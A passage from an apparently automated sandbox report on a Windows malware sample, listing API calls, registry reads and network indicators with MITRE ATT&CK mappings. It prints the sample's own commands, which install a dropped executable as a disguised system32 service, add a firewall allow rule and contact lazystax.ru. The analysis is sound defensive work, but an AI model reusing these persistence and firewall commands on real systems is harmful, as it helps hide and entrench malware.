\"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpqec.dll (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WSHELPER.DLL (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHHTTP.DLL (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter FWCFG.DLL (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter AUTHFWCFG.DLL (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter IFMON.DLL (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETIOHLP.DLL (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WHHELPER.DLL (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HNETMON.DLL (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter RPCNSH.DLL (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DOT3CFG.DLL (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NAPMONTR.DLL (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHIPSEC.DLL (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETTRACE.DLL (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WCNNETSH.DLL (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter P2PNETSH.DLL (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WLANCFG.DLL (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WWANCFG.DLL (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter PEERDISTSH.DLL (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HTTPAPI.dll (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter userenv.dll (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005856)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter Iphlpapi.dll (UID: 00000000-00005700)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00005700)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005700)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00005700)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00005700)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005184)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C mkdir %WINDIR%\\system32\\cygqxrtx\\\" - (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C move /Y \"%TEMP%\\mdzgxwae.exe\" %WINDIR%\\system32\\cygqxrtx\\\" - (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" create cygqxrtx binPath= \"%WINDIR%\\system32\\cygqxrtx\\mdzgxwae.exe /d\\\"C:\\6e0fc8d7b0d1c1cc6f3642b587\" - (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" description cygqxrtx \"wifi internet conection\"\" - (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" start cygqxrtx\" - (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\netsh.exe\" advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow prog\" - (UID: 00000000-00005184)\n \"mdzgxwae.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00006096)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75D10000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75D10000\n \"sc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75D10000\n \"mdzgxwae.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75D10000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75D10000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75D10000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"mdzgxwae.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"\n \"mdzgxwae.exe\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"sc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"sc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"mdzgxwae.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"mdzgxwae.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"netsh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"netsh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\cygqxrtx\\\\\" (UID: 00000000-00005476)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\mdzgxwae.exe\" %WINDIR%\\\\system32\\\\cygqxrtx\\\\\" (UID: 00000000-00005412)\n Spawned process \"sc.exe\" with commandline \"create cygqxrtx binPath= \"%WINDIR%\\\\system32\\\\cygqxrtx\\\\mdzgxwae ...\" (UID: 00000000-00005352), Spawned process \"sc.exe\" with commandline \"description cygqxrtx \"wifi internet conection\"\" (UID: 00000000-00005780), Spawned process \"sc.exe\" with commandline \"start cygqxrtx\" (UID: 00000000-00005912), Spawned process \"mdzgxwae.exe\" with commandline \"/d\"C:\\\\6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b ...\" (UID: 00000000-00006096)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00005856), Spawned process \"svchost.exe\" (UID: 00000000-00005700)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\cygqxrtx\\\\\" (UID: 00000000-00005476)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\mdzgxwae.exe\" %WINDIR%\\\\system32\\\\cygqxrtx\\\\\" (UID: 00000000-00005412)\n Spawned process \"sc.exe\" with commandline \"create cygqxrtx binPath= \"%WINDIR%\\\\system32\\\\cygqxrtx\\\\mdzgxwae ...\" (UID: 00000000-00005352), Spawned process \"sc.exe\" with commandline \"description cygqxrtx \"wifi internet conection\"\" (UID: 00000000-00005780), Spawned process \"sc.exe\" with commandline \"start cygqxrtx\" (UID: 00000000-00005912), Spawned process \"mdzgxwae.exe\" with commandline \"/d\"C:\\\\6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b ...\" (UID: 00000000-00006096)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00005856), Spawned process \"svchost.exe\" (UID: 00000000-00005700)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"mdzgxwae.exe\" (UID: 00000000-00006096) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP\"\n Process \"mdzgxwae.exe\" (UID: 00000000-00006096) was launched with missing environment variables: \"LOGONSERVER, HOMEPATH, HOMEDRIVE\"\n Process \"netsh.exe\" (UID: 00000000-00005856) was launched with new environment variables: \"LOGONSERVER=\"%HOSTNAME%\", HOMEPATH=\"\\Users\\%OSUSER%\", HOMEDRIVE=\"C:\"\"\n Process \"netsh.exe\" (UID: 00000000-00005856) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP\"\n Process \"svchost.exe\" (UID: 00000000-00005700) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP\"\n Process \"svchost.exe\" (UID: 00000000-00005700) was launched with missing environment variables: \"LOGONSERVER, HOMEPATH, HOMEDRIVE\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-302", "type": 9, "relevance": 3, "name": "Tries to move files", "description": "Process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\mdzgxwae.exe\" %WINDIR%\\\\system32\\\\cygqxrtx\\\\\" (UID: 00000000-00005412)", "origin": "Monitored Target", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"mdzgxwae.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"mdzgxwae.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"mdzgxwae.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:443\"\n \"<IPv4>:80\"\n \"<IPv4>:25\"\n \"<IPv4>:443\"\n \"<IPv4>:25\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"lazystax.ru\"\n \"microsoft-com.mail.protection.outlook.com\"\n \"microsoft.com\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe\" has an executable section named \".text\"\n \"mdzgxwae.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe\" has an writable section named \".data\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe\" has an writable section named \".text\"\n \"mdzgxwae.exe\" has an writable section named \".data\"\n \"mdzgxwae.exe\" has an writable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".reloc\" is \"0xc9e000\" greater than 0x100000\n Raw size of \".reloc\" is \"0xda4000\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"mdzgxwae.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe\" was detected as \"VC8 -> Microsoft Corporation\"\n \"mdzgxwae.exe\" was detected as \"VC8 -> Microsoft Corporation\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"mdzgxwae.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\mdzgxwae.exe]- [targetUID: 00000000-00005184]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to access non-existent file \"C:\\dbghelp.dll\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to access non-existent file \"C:\\msvcr100.dll\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to access non-existent file \"C:\\apphelp.dll\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"sc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"mdzgxwae.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"netsh.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"svchost.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" reads file \"c:\\6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\"; Key: \"\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"OPEN\"; Path: 